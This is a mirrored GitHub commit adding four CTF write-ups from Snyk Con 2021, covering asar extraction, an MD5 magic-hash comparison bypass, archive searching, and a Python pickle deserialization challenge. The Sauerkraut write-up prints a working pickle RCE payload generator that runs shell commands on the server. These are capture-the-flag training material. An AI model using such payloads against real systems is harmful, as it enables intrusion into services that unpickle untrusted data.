mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Add files via upload
This commit is contained in:
parent
c82ffcba73
commit
5e0e1db8a5
4 changed files with 129 additions and 0 deletions
17
Snyk Con 2021/Electronbuzz.md
Normal file
17
Snyk Con 2021/Electronbuzz.md
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Electronbuzz (Misc)
|
||||
|
||||
In this challenge we were given an electron application in the form of windows,linux file , so I downloaded the debian package and extracted it , on which I `app.asar` file , which in electron holds the source code and some configuration file of the main application
|
||||
|
||||
<img src="https://i.imgur.com/BTwLhZx.png"/>
|
||||
|
||||
We can extract this by using `npx asar extract app.asar .` , you can install `npx` using `npm install -g asar`
|
||||
|
||||
<img src="https://i.imgur.com/yivO93v.png"/>
|
||||
|
||||
And we can get the flag by reading `challenge.yml`
|
||||
|
||||
<img src="https://i.imgur.com/8Q0KleS.png"/>
|
||||
|
||||
|
||||
## References
|
||||
- https://stackoverflow.com/questions/38523617/how-to-unpack-an-asar-file
|
23
Snyk Con 2021/Magician.md
Normal file
23
Snyk Con 2021/Magician.md
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Magician (Web)
|
||||
|
||||
This web challenege had an input field where it was asking for us to input the string whose md5 hash will be equal to the given one meaning a hash collision where hashes of different file or string are similar
|
||||
|
||||
<img src="https://i.imgur.com/KILYmf2.png"/>
|
||||
|
||||
I tried to give some random text and in the bottom it should be the md5 hash of that string
|
||||
|
||||
<img src="https://i.imgur.com/Y7msap5.png"/>
|
||||
|
||||
But we need to put a string whose hash will be the same like this `0e365027561978452045683563242341` I tried to crack this md5hash using crackstation and hashcat but failed ,so I googled for this hash
|
||||
|
||||
<img src="https://i.imgur.com/fh3saxZ.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/LBGofQ2.png"/>
|
||||
|
||||
So we just have to submit this string `QNKCDZO` and we will pass the condition
|
||||
|
||||
<img src="https://i.imgur.com/qQTmOc6.png"/>
|
||||
|
||||
## References
|
||||
|
||||
- https://stackoverflow.com/questions/22140204/why-md5240610708-is-equal-to-md5qnkcdzo
|
11
Snyk Con 2021/Robert Louis Stevenson.md
Normal file
11
Snyk Con 2021/Robert Louis Stevenson.md
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Robert Louis Stevenson (Misc)
|
||||
|
||||
In this challenge we were given a tar file that on extracting we have some folders which also included archive file
|
||||
|
||||
<img src="https://i.imgur.com/hK01Eg3.png"/>
|
||||
|
||||
Going into each directory and search for a file which may have something
|
||||
|
||||
<img src="https://i.imgur.com/V6NEQni.png"/>
|
||||
|
||||
And the flag was in one of the folders
|
78
Snyk Con 2021/Sauerkraut.md
Normal file
78
Snyk Con 2021/Sauerkraut.md
Normal file
|
@ -0,0 +1,78 @@
|
|||
# Sauerkraut (Web)
|
||||
|
||||
This was a web challenege that had text form where we can submit text
|
||||
|
||||
<img src="https://i.imgur.com/5CYfcie.png"/>
|
||||
|
||||
On entering some text , it gave us an error about "invalid base64"
|
||||
|
||||
<img src="https://i.imgur.com/oDbT5nw.png"/>
|
||||
|
||||
So after inputtting encoded text we get this
|
||||
|
||||
<img src="https://i.imgur.com/yPef4wk.png"/>
|
||||
|
||||
It then showed that "it could not find MARK" , I didn't know what that meant so I just encoded that text
|
||||
|
||||
<img src="https://i.imgur.com/bLE5Swn.png"/>
|
||||
|
||||
And when I submitted that , it showed me "pickle data was truncated"
|
||||
|
||||
<img src="https://i.imgur.com/zB07yni.png"/>
|
||||
|
||||
Here I then goolged `pickle` , and found that it's a library or module that allows you to serliaze data , convert them into objects so that it can be passed for different process
|
||||
|
||||
<img src="https://i.imgur.com/QB4otDA.png"/>
|
||||
|
||||
And this lead me to exploiting to pickle in python , I found a resource where it showed RCE for pickle so this is the PoC that I found
|
||||
|
||||
```python
|
||||
import base64
|
||||
import codecs
|
||||
import pickle
|
||||
|
||||
class RCE(object):
|
||||
def __reduce__(self):
|
||||
import subprocess
|
||||
return (subprocess.check_output, (['id'], ) )
|
||||
class RCEStr(object):
|
||||
def __reduce__(self):
|
||||
return (codecs.decode, (RCE(), 'utf-8') )
|
||||
|
||||
pickle_data = pickle.dumps({'name': RCEStr()})
|
||||
payload = base64.urlsafe_b64encode(pickle_data)
|
||||
print(payload.decode('utf-8'))
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/59wwxtf.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/sTPtoSR.png"/>
|
||||
|
||||
Perfect , we have found the we can do remote code execution , all that is left is to find the flag , so I ran `ls` command to see if there's a file we can read
|
||||
|
||||
<img src="https://i.imgur.com/bUPduRx.png"/>
|
||||
|
||||
```python
|
||||
import base64
|
||||
import codecs
|
||||
import pickle
|
||||
|
||||
class RCE(object):
|
||||
def __reduce__(self):
|
||||
import subprocess
|
||||
return (subprocess.check_output, (['cat','flag'], ) )
|
||||
class RCEStr(object):
|
||||
def __reduce__(self):
|
||||
return (codecs.decode, (RCE(), 'utf-8') )
|
||||
|
||||
pickle_data = pickle.dumps({'name': RCEStr()})
|
||||
payload = base64.urlsafe_b64encode(pickle_data)
|
||||
print(payload.decode('utf-8'))
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/KOvSXVb.png"/>
|
||||
|
||||
## References
|
||||
|
||||
- https://davidhamann.de/2020/04/05/exploiting-python-pickle/
|
||||
- https://medium.com/@jonoans/sans-mixed-discipline-ctf-wx01-283b6795d34a
|
Loading…
Reference in a new issue